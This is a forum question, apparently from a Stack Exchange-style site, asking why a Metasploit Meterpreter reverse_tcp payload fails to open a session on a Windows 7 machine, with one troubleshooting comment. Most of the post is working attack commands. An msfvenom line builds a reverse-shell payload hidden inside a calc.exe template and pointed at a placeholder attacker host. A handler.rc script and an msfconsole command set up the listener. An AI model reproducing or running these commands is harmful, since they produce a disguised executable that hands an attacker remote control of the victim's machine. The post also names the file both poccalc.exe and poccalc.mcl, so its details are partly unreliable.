# Meterpreter shell reverse_tcp payload not opening session

Tags: metasploit, msfvenom

I'm using msfvenom to create a payload with a calc.exe file as the template for a windows 7 machine using the HTTPS port. I create the file by using the following:

```
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST:[attacker_ip] LPORT:443 -f exe -x /root/Desktop/calc.exe -o /root/Desktop/poccalc.exe
```

I then move the file to the windows 7 machine and create a short script to run with msfconsole called handler.rc:

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [attacker_ip]
set LPORT 443
set ExitOnSession false
exploit -j -z
```

I run Metasploit then by doing the following:

```
msfconsole -r handler.rc
```

So that now the reverse_tcp is listening, but whenever I run the poccalc.mcl file on the windows machine, it runs, but never opens up a meterpreter shell.

I have been absolutely stuck and haven't been able to get any direction on how to fix this or find out what is wrong.

Comment: Have you run a packet capture to see is the shell is launching toward your listener? Is there a networking connections to the listener machine? Is the Windows firewall off?